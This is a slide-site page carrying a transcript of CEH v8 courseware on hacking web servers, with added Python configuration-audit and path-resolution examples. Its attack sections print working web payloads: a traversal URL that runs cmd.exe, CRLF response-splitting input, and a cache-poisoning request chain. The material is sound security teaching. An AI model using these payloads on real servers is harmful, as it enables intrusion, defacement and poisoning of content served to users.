Ceh v8 labs module 13 hacking web applicationsCeh v8 labs module 13 hacking web applications
Ceh v8 labs module 13 hacking web applications
 
Ce hv8 module 18 buffer overflow
Ce hv8 module 18 buffer overflowCe hv8 module 18 buffer overflow
Ce hv8 module 18 buffer overflow
 
Minor Mistakes In Web Portals
Minor Mistakes In Web PortalsMinor Mistakes In Web Portals
Minor Mistakes In Web Portals
 
27.2.12 lab interpret http and dns data to isolate threat actor
27.2.12 lab   interpret http and dns data to isolate threat actor27.2.12 lab   interpret http and dns data to isolate threat actor
27.2.12 lab interpret http and dns data to isolate threat actor
 
Hacking3e ppt ch09
Hacking3e ppt ch09Hacking3e ppt ch09
Hacking3e ppt ch09
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
 
Web Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security ForgotWeb Application Security: The Land that Information Security Forgot
Web Application Security: The Land that Information Security Forgot
 
How not to suck at Cyber Security
How not to suck at Cyber SecurityHow not to suck at Cyber Security
How not to suck at Cyber Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Best Practices to Mitigate from the Emerging Vectors of Network Attack
Best Practices to Mitigate from the Emerging Vectors of Network AttackBest Practices to Mitigate from the Emerging Vectors of Network Attack
Best Practices to Mitigate from the Emerging Vectors of Network Attack
 
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
 
Google Analytics blog support
Google Analytics blog supportGoogle Analytics blog support
Google Analytics blog support
 
Patch Tuesday for January 2020
Patch Tuesday for January 2020Patch Tuesday for January 2020
Patch Tuesday for January 2020
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
August Patch Tuesday Analysis
August Patch Tuesday AnalysisAugust Patch Tuesday Analysis
August Patch Tuesday Analysis
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
March 2019 Patch Tuesday Analysis
March 2019 Patch Tuesday AnalysisMarch 2019 Patch Tuesday Analysis
March 2019 Patch Tuesday Analysis
 

Último

Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?IES VE
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 

Último (20)

Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 

Ce hv8 module 12 hacking webservers

  • 1. H a c k in g W e b s e r v e rs Module 12
  • 2. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Hacking Webservers Module 12 En g in e e red by Hackers. Pre se n te d by Professio nals. E th ic a l H a c k in g a n d C o u n te r m e a s u r e s v8 M odule 12: Hacking Webservers Exam 312-50 Module 12 Page 1601 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 3. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker GoDaddy Outage Takes Down Millions of Sites, Anonymous Member Claim s Responsibility Monday, September 10th, 2012 Final update: GoDaddy is up, and claims th a t the outage was due to internal errors and not a DD0S attack. According to many customers, sites hosted by major web host and domain registrar GoDaddy are down. According to the official GoDaddy Tw itter account the company is aware o f the issue and is working to resolve it. Update: customers are com plaining tha t GoDaddy hosted e-mail accounts are down as well, along w ith GoDaddy phone service and all sites using GoDaddy's DNS service. Update 2: A m em ber o f Anonymous known as AnonymousOwn3r is claiming responsibility, and makes it clear this is not an Anonymous collective action. A tipste r tells us tha t the technical reason fo r the failure is being caused by the inaccessibility o f GoDaddy's DNS servers — specifically CNS1.SECURESERVER.NET, CNS2.SECURESERVER.NET, and CNS3.SECURESERVER.NET are failing to resolve. http://techcrunch.com Copyright © by E - * n i . All Rights Reserved. Reproduction is Strictly Prohibited. GGacl S ecurity N ew s Nnus GoD addy O utage T akes Down M illions of Sites, Anonym ous M em ber C laim s R esponsibility Source: http://techcrunch.com Final update: GoDaddy is up, and claims that the outage was due to internal errors and not a DD0 S attack. According to many customers, sites hosted by major web host and domain registrar GoDaddy are down. According to the official GoDaddy Twitter account, the company is aware of the issue and is working to resolve it. Update: Customers are complaining that GoDaddy hosted e-mail accounts are down as well, along with GoDaddy phone service and all sites using GoDaddy's DNS service. Update 2: A member of Anonymous known as AnonymousOwn3r is claiming responsibility, and makes it clear this is not an Anonymous collective action. 
A tipster tells us that the technical reason for the failure is being caused by the inaccessibility of GoDaddy's DNS servers - specifically CNS1.SECURESERVER.NET, CNS2.SECURESERVER.NET, and CNS3.SECURESERVER.NET are failing to resolve. Module 12 Page 1602 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 4. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker AnonymousOwn3r‫׳‬s bio reads "Security leader of #Anonymous (‫ ”׳‬Official m em ber")." The individual claims to be from Brazil, and hasn't issued a statement as to why GoDaddy was targeted. Last year GoDaddy was pressured into opposing SOPA as customers transferred domains off the service, and the company has been the center of a few other controversies. However, AnonymousOwn3r has tweeted "I'm not anti go daddy, you guys will understand because i did this attack." Copyright © 2012 AOL Inc. By Klint Finley http://techcrunch.com/2012/09/10/godaddy-outage-takes-down-millions-of-sites/ Module 12 Page 1603 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 5. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Module Objectives CEH Urt1fW4 J IIS Webserver Architecture J Countermeasures J W hy W eb Servers are Compromised? J J Impact of Webserver Attacks How to Defend Against Web Server Attacks J Webserver Attacks J Patch Management J Webserver Attack Methodology J Patch Management Tools J Webserver Attack Tools J Webserver Security Tools J Metasploit Architecture J Webserver Pen Testing Tools J Web Password Cracking Tools J ttlMUl ttMhM Webserver Pen Testing ‫ ־־‬L / ^ Copyright © by IG-COHCil. All Rights Reserved. Reproduction is Strictly Prohibited. ^ M odule O b jectiv e s •—* > Often, a breach in security causes more damage in terms of goodwill than in actual quantifiable loss. This makes web server security critical to the normal functioning of an organization. Most organizations consider their web presence to be an extension of themselves. This module attempts to highlight the various security concerns in the context of webservers. After finishing this module, you will able to understand a web server and its architecture, how the attacker hacks it, what the different types attacks that attacker can carry out on the web servers are, tools used in web server hacking, etc. Exploring web server security is a vast domain and to delve into the finer details of the discussion is beyond the scope of this module. This module makes you familiarize with: e IIS Web Server Architecture e e W hy W eb Servers Are Compromised? e e Webserver Attacks e Webserver Attack Methodology Q Webserver Attack Tools e Metasploit Architecture e Web Password Cracking Tools Module 12 Page 1604 How to Defend Against W eb Server Attacks Impact of Webserver Attacks e Countermeasures e Patch Management 0 Patch Management Tools e W ebserver Security Tools e W ebserver Pen Testing Tools e W ebserver Pen Testing Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. 
Reproduction is Strictly Prohibited.
  • 6. Ethical Hacking and Countermeasures Hacking Webservers Exam 312-50 Certified Ethical Hacker Module Flow CEH Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u l e F lo w To understand hacking web servers, first you should know what a web server is, how it functions, and what are the other elements associated with it. All these are simply termed web server concepts. So first we will discuss about web server concepts. 4 m) Webserver Attacks Webserver Concepts ------ Attack Methodology * Webserver Pen Testing y Patch Management Webserver Attack Tools Webserver Security Tools ■— ■— Counter-measures This section gives you brief overview of the web server and its architecture. It will also explain common reasons or mistakes made that encourage attackers to hack a web server and become successful in that. This section also describes the impact of attacks on the web server. Module 12 Page 1605 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Web Server Market Shares

Source: http://w3techs.com

The following statistics show the percentage of websites running each web server. Apache is the most widely used web server, at 64.6% of sites, followed by Microsoft IIS at 17.4% and Nginx at 13%.

Figure 12.1: Web Server Market Shares (share of websites)

    Apache          64.6%
    Microsoft IIS   17.4%
    Nginx           13%
    LiteSpeed        1.7%
    Google Server    1.2%
    Tomcat and Lighttpd also appear in the chart with smaller shares (values not shown)
Open Source Web Server Architecture

Figure 12.2 illustrates the basic components of a typical open source web server stack. Site users and the site administrator reach the server over the Internet, and so do attacks. The server itself consists of the following layers:

- Linux: the server's operating system, including the file system
- Apache: the web server component
- MySQL: a relational database
- PHP: the application layer, together with compiled extensions and supporting services such as email

Figure 12.2: Open Source Web Server Architecture
IIS Web Server Architecture

Internet Information Services (IIS) is a web server developed by Microsoft for Windows, described by Microsoft as a flexible, secure, and easy-to-manage web server for hosting anything on the web. It is the second most widely used web server after the Apache HTTP Server, with about 17.4% of the market. It supports HTTP, HTTPS, FTP, FTPS, SMTP, and NNTP.

Figure 12.3 shows the basic components of the IIS architecture:

- Kernel mode: the HTTP protocol stack (HTTP.SYS) receives client requests from the Internet and queues them for the worker processes.
- User mode: svchost.exe hosts the Windows Activation Service (WAS) and the WWW Service, which read applicationHost.config and manage the application pools.
- Application pool: a worker process containing the web server core, which runs the request pipeline (begin request processing, authentication, authorization, cache resolution, handler mapping, handler pre-execution, release state, update cache, update log, and end request processing).
- Native modules: anonymous authentication, the managed engine, IIS certificate mapping, static file, default document, HTTP cache, HTTP errors, and HTTP logging.
- Managed modules: run inside an AppDomain, for example Forms Authentication; external applications are hosted alongside them.

Figure 12.3: IIS Web Server Architecture
Website Defacement

Website defacement is the alteration of a website's content by an attacker who has broken into the web server. The intruder maliciously changes the visual appearance of a web page by inserting or substituting provocative and frequently offensive content. Defaced pages expose visitors to propaganda or misleading information until the unauthorized change is discovered and corrected.

Figure 12.4: Website Defacement. The example shows http://juggyboy.com/index.aspx replaced with the attacker's message: "You are OWNED!!!!!!! HACKED! Hi Master, Your website owned by US, Hacker! Next target - microsoft.com".
Why Web Servers Are Compromised

There are inherent security risks associated with web servers, the local area networks that host websites, and the users who access those websites with browsers.

- Webmaster's concern: From a webmaster's perspective, the biggest security concern is that the web server can expose the local area network (LAN) or the corporate intranet to the threats the Internet poses, whether viruses, Trojans, attackers, or the compromise of information itself. Software bugs in large, complex programs are a common source of security lapses, and web servers are themselves large, complex programs that carry these inherent risks. In addition, the open architecture of web servers allows arbitrary scripts to run on the server side while answering remote requests, and any CGI script installed at the site may contain bugs that are potential security holes.

- Network administrator's concern: From a network administrator's perspective, a poorly configured web server is another potential hole in the local network's security. While the objective of a web server is to provide controlled access to the network, too much control can make it almost impossible to use. In an intranet environment, the network administrator has to configure the web server carefully so that legitimate users are recognized and authenticated, and the various groups of users are assigned distinct access privileges.

- End user's concern: Usually the end user does not perceive any immediate threat, as surfing the web appears both safe and anonymous. However, active content such as ActiveX controls and Java applets makes it possible for harmful applications, such as viruses, to invade the user's system. Active content downloaded by the browser can also be a conduit for malicious software to bypass the firewall and spread through the local area network.

The table that follows lists the causes of web server compromises and their consequences:

Table 12.1: Causes and consequences of web server compromises

    Cause                                                                 | Consequence
    ----------------------------------------------------------------------|-----------------------------------------------------------------------
    Installing the server with default settings                           | Unnecessary default, backup, or sample files
    Improper file and directory permissions                               | Security conflicts with the business ease-of-use case
    Default accounts with their default or no passwords                   | Misconfigurations in the web server, operating system, and network
    Unpatched security flaws in the server software, OS, and applications | Lack of proper security policy, procedures, and maintenance
    Misconfigured SSL certificates and encryption settings                | Bugs in server software, OS, and web applications
    Use of self-signed certificates and default certificates              | Improper authentication with external systems
    Unnecessary services enabled, including content management            | Administrative or debugging functions that are enabled or accessible
    and remote administration                                             |
Impact of Web Server Attacks

Attackers can cause various kinds of damage to an organization by attacking its web server:

- Compromise of user accounts: Many web server attacks are aimed at user accounts. A compromised account gives the attacker useful information and a foothold from which to launch further attacks on the web server.
- Data tampering: The attacker can alter or delete data, or replace it with malware so that whoever connects to the web server is compromised as well.
- Website defacement: The attacker replaces the site's content with pages and messages of their own, changing how the site looks to visitors.
- Secondary attacks from the website: Once a web server is compromised, the attacker can use it to launch further attacks on other websites or on client systems.
- Data theft: Data is one of a company's main assets; attackers can gain access to sensitive data such as the source code of a particular program.
- Root access to other applications or servers: Root access is the highest privilege level on a system, whether a dedicated server, a semi-dedicated server, or a virtual private server. With root access the attacker can perform any action on the compromised host and pivot to the applications and servers it connects to.
Module Flow

Having covered web server concepts, we move on to the possible attacks on a web server. Nearly every online action is carried out with the help of a web server, which makes it a critical resource of an organization and the reason attackers target it. This section covers the attack techniques attackers use to compromise web servers: web server misconfiguration, directory traversal, HTTP response splitting, web cache poisoning, HTTP response hijacking, SSH brute force, man-in-the-middle attacks, password cracking, and web application attacks.
Web Server Misconfiguration

Web servers have various vulnerabilities related to configuration, applications, files, scripts, or web pages. Once an attacker finds one of these weaknesses, for example a remotely accessible administration application, it becomes a doorway into the company's network, and such loopholes can let attackers bypass user authentication. Server misconfiguration refers to configuration weaknesses in the web infrastructure that can be exploited to launch attacks on web servers such as directory traversal, server intrusion, and data theft. Once detected, these problems are easy to exploit and can result in the total compromise of a website. Typical misconfigurations include:

- Remote administration functions left reachable
- Unnecessary services enabled
- Misconfigured or default SSL certificates
- Verbose debug/error messages
- Anonymous or default users/passwords
- Sample configuration and script files
Web Server Misconfiguration Example

Consider this httpd.conf fragment on an Apache server:

    <Location /server-status>
        SetHandler server-status
    </Location>

Figure 12.5: httpd.conf fragment on an Apache server

This configuration allows anyone to view the server status page, which contains detailed information about the current use of the web server, including the hosts currently connected and the requests being processed, because no access-control directive (such as Require or Allow) restricts the location.

Consider another example, this php.ini fragment:

    display_errors = On
    log_errors = On
    error_log = syslog
    ignore_repeated_errors = Off

Figure 12.6: php.ini fragment

With display_errors = On, PHP sends verbose error messages, including script paths and line numbers, to the client instead of only to the error log.
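The two fragments above can be checked mechanically. The following Python script is an added example, not code from the module: it parses an httpd.conf fragment for <Location> blocks that enable the server-status handler without any access-control directive, and a php.ini fragment for display_errors left on. The configuration texts are constructed for the example; the hardened variants (Require ip 127.0.0.1, display_errors = Off) are one reasonable fix, not the only one.

```python
import re

# Constructed sample fragments for this example (not taken from a real server).
WEAK_HTTPD_CONF = """
<Location /server-status>
    SetHandler server-status
</Location>
"""

HARDENED_HTTPD_CONF = """
<Location /server-status>
    SetHandler server-status
    Require ip 127.0.0.1
</Location>
"""

WEAK_PHP_INI = """
display_errors = On
log_errors = On
error_log = syslog
ignore_repeated_errors = Off
"""

HARDENED_PHP_INI = """
display_errors = Off
log_errors = On
error_log = syslog
"""

LOCATION_RE = re.compile(r"<Location\s+([^>]+)>(.*?)</Location>", re.S | re.I)
ACCESS_RE = re.compile(r"^\s*(Require|Allow|Deny|Order)\b", re.M | re.I)
STATUS_RE = re.compile(r"^\s*SetHandler\s+server-status\b", re.M | re.I)


def audit_httpd_conf(text):
    """Return one finding per <Location> block that enables the server-status
    handler without any access-control directive inside the block."""
    findings = []
    for match in LOCATION_RE.finditer(text):
        path, body = match.group(1).strip(), match.group(2)
        if STATUS_RE.search(body) and not ACCESS_RE.search(body):
            findings.append(f"{path}: server-status handler enabled with no access control")
    return findings


def parse_ini(text):
    """Minimal php.ini parser: 'key = value' lines; ';' and '#' start comments."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.lower()
    return settings


def audit_php_ini(text):
    """Flag php.ini settings that leak verbose errors to clients.
    display_errors=On prints messages, script paths and line numbers in the page."""
    settings = parse_ini(text)
    findings = []
    if settings.get("display_errors") in ("on", "1", "true", "stdout"):
        findings.append("display_errors is enabled: errors are shown to clients")
    if settings.get("log_errors") not in ("on", "1", "true"):
        findings.append("log_errors is disabled: errors are not recorded server-side")
    return findings


if __name__ == "__main__":
    for name, conf in [("weak httpd.conf", WEAK_HTTPD_CONF), ("hardened httpd.conf", HARDENED_HTTPD_CONF)]:
        print(name, audit_httpd_conf(conf) or ["ok"])
    for name, ini in [("weak php.ini", WEAK_PHP_INI), ("hardened php.ini", HARDENED_PHP_INI)]:
        print(name, audit_php_ini(ini) or ["ok"])
```

Run against a real configuration, the same two functions take the file contents of httpd.conf (including any Include'd files, which this example does not follow) and php.ini; the check for an access directive is deliberately coarse, so a `Require all granted` would still pass it and deserves a manual look.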
Directory Traversal Attacks

Web servers are designed to limit public access to a defined document root. A directory traversal attack exploits HTTP request handling so that the attacker can access restricted directories and execute commands outside the web server's root directory by manipulating the URL, typically with "../" sequences or their URL-encoded forms (for example %5c for a backslash). Attackers can use trial and error to navigate outside the root directory and reach sensitive files on the system. In the example request, the traversal sequence escapes the scripts directory, reaches cmd.exe, and runs a directory listing of the C: drive:

    http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:

The server answers with the listing of C: (volume serial number, AUTOEXEC.BAT, CONFIG.SYS, Documents and Settings, Program Files, WINDOWS, and so on), all of which lies outside the web root.

Figure 12.7: Directory Traversal Attacks
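The request above works because the server joins the decoded path onto its document root and trusts the result. The following Python code is an added example, not from the module: it shows that naive resolution next to a hardened one that normalises the path and then refuses anything outside the root. The web root and the request paths are constructed for the example; backslashes are treated as separators to mirror IIS, which is what makes %5c useful to the attacker.

```python
import posixpath
from urllib.parse import unquote

# Assumption for the example: the document root the server should never leave.
WEB_ROOT = "/var/www/html"


def _decode(url_path):
    """Decode the URL exactly once and treat backslashes as separators, as IIS
    does: '..%5c..' becomes '../..'."""
    return unquote(url_path).replace("\\", "/")


def naive_resolve(web_root, url_path):
    """Vulnerable: join the decoded request path onto the web root and trust
    the result. Every '..' segment walks one directory up, including above root."""
    return posixpath.normpath(posixpath.join(web_root, _decode(url_path).lstrip("/")))


def is_inside(web_root, path):
    """True when path is the web root itself or lies below it."""
    root = posixpath.normpath(web_root)
    return path == root or path.startswith(root + "/")


def safe_resolve(web_root, url_path):
    """Hardened: normalise first, then refuse anything that left the web root
    or carries a NUL byte. Returns the filesystem path, or None (answer 403/404)."""
    decoded = _decode(url_path)
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))
    return candidate if is_inside(web_root, candidate) else None


if __name__ == "__main__":
    # The request path from the figure, query string stripped (constructed, not captured).
    attack = "/scripts/..%5c../Windows/System32/cmd.exe"
    print("naive :", naive_resolve(WEB_ROOT, attack))   # escapes the root
    print("safe  :", safe_resolve(WEB_ROOT, attack))    # None: rejected
    print("safe  :", safe_resolve(WEB_ROOT, "/index.html"))
```

The hardened resolver decodes exactly once before checking; a server that decodes a second time after the check (as older IIS versions did) reopens the hole to %255c. On a real filesystem, resolve symlinks with os.path.realpath before the prefix check as well.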
HTTP Response Splitting Attack

HTTP response splitting is a web-based attack in which the attacker injects CRLF (carriage return, line feed) sequences and arbitrary header data into an input field that the application copies into an HTTP response header. Because the server does not strip the line breaks, the single response it emits is interpreted by the browser or an intermediate proxy as two responses. The attacker controls the first response and can use it, for example, to redirect the user to a malicious website or to mount cross-site scripting or web cache poisoning; the remaining response is discarded by the browser.

In the example, the application stores a request parameter in a cookie without validation:

    String author = request.getParameter(AUTHOR_PARAM);
    Cookie cookie = new Cookie("author", author);
    cookie.setMaxAge(cookieExpiration);
    response.addCookie(cookie);

With the input "Jason", the server replies normally:

    HTTP/1.1 200 OK
    Set-Cookie: author=Jason

With the input "JasonTheHacker\r\nHTTP/1.1 200 OK\r\n", the injected line break ends the first response and starts a second one:

    First response (controlled by the attacker)
    HTTP/1.1 200 OK
    Set-Cookie: author=JasonTheHacker

    Second response
    HTTP/1.1 200 OK

Figure 12.8: HTTP Response Splitting Attack
Web Cache Poisoning Attack

Web cache poisoning attacks the trustworthiness of an intermediate web cache: the legitimate content cached for a URL is replaced with attacker-supplied content, and every user served from that cache receives the poisoned content instead of the real page when requesting that URL. The attacker first forces the cache to drop its copy of the target page and then sends a specially crafted request whose second, attacker-controlled response is stored in the cache under the target URL.

Figure 12.9 shows the procedure step by step against juggyboy.com, whose redirect script copies a request parameter straight into a header:

    <?php header("Location:" . $_GET['page']); ?>

1. The attacker sends a request that removes the page from the cache:

       GET http://juggyboy.com/index.html HTTP/1.1
       Pragma: no-cache
       Host: juggyboy.com
       Accept-Charset: iso-8859-1,*,utf-8

2. The cache forwards the request and returns the normal response; its entry for juggyboy.com/index.html is now cleared.

3. The attacker sends a response-splitting request to the redirect script that generates two responses (steps 4 and 6):

       GET http://juggyboy.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>Attack Page</html> HTTP/1.1
       Host: juggyboy.com

4. The attacker receives the first server response (the redirect, with Content-Length: 0).

5. The attacker immediately requests http://juggyboy.com/index.html again so that the cache creates a new entry for it:

       GET http://juggyboy.com/index.html HTTP/1.1
       Host: testsite.com
       User-Agent: Mozilla/4.7 [en] (WinNT; I)
       Accept-Charset: iso-8859-1,*,utf-8

6. The cache pairs the second response from step 3, the attacker's page, with the request from step 5 and stores it.

The result is a poisoned server cache in which the entry for www.juggyboy.com points to the attacker's page.

Figure 12.9: Web Cache Poisoning Attack
HTTP Response Hijacking

HTTP response hijacking is built on a response splitting request. The attacker first sends a response splitting request to the web server, which splits its reply into two responses: the first goes to the attacker and the second to the victim. The victim then requests a service from the server and supplies credentials; at the same time, the attacker requests the index page. Because the server's response queue is now out of step with the requests, the web server delivers the response to the victim's request to the attacker, and the victim remains unaware.

